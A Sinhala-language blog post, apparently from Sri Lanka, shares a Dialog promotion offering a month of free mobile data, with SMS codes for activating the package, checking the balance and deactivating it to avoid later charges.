ඔන්න Dialog වෙතින් වටින වැඩක් කරලා. අපේ යාළුවොන්ට මාසයක් පුරාවට නොමිළේ Internet දීලා.. මේකට 1350 mb හම්බෙනවා. 900 mb Youtube යන්න, 450 mb සාමාන්‍ය Browsing.. මේක වැඩිකල් තියෙන එකක් නෑ.. ඉක්මනට දාගන්න. නෙට් යනගමන් ඉතිරි ප්‍රමාණය බලාගන්න mbb කියලා ගහලා 678 sms කරන්න.

ඔයාලා "Free159" ගහනකොට space තියන්න එපා.. (free 159 නෙවෙයි free159)

ඕං Screenshot එකකුත් දානවා එහෙනං..


මේක ඉවර වුණාට පස්සෙ සල්ලි කැපෙයි කියලා කලබල වුණු කිහිපදෙනෙක්ම මගෙන් ඒ බව ඇහුවා. මටත් ඉතිං ඔය ප්‍රශ්නෙම ආවට මගේ ෆෝං එකේ රු. 50ට වඩා කවදාවත් බැලන්ස් එක උඩ යන්නෙ නැති නිසා මට ගානක් නැහැ. නමුත් ඔයාලට මේක නවත්තගන්න ඕනෙ වුණොත් කරන්න ඕනෙ දේයි කියන්නෙ.
මුළින්ම කියන්න ඕනෙ මාසෙ යන්න ඉස්සරින් පැකේජ් එක ඉවරවුණාට අලුත් පැකේජ් එකක් Active වෙන්නෙ නෑ. එහෙම වුණොත් වෙන්නෙ මාසෙකට පස්සෙ. එහෙම Active වෙනවමයි කියන්න මම දන්නෙ නෑ. කෝකටත් මාසෙ ඉවරවෙන්න කළින් Data ටික ඉවරකරලා පැකේජ් එක Deactive කරගන්න එක ඇගට ගුණයි. ඒකට මෙහෙම කරන්න.

Off knk කියලා 678 ට මැසේජ් කරන්න. මේක KNKTD පැකේජ් promotion එකක් නිසා..

ඔයාලටත් මේක හරිගියා නම්, පුළුවන් නම් විතරක් අපිට Screenshot එකක් දීල යන්න. නැත්නම් කමෙන්ට් එකක් දාගෙන යන්න.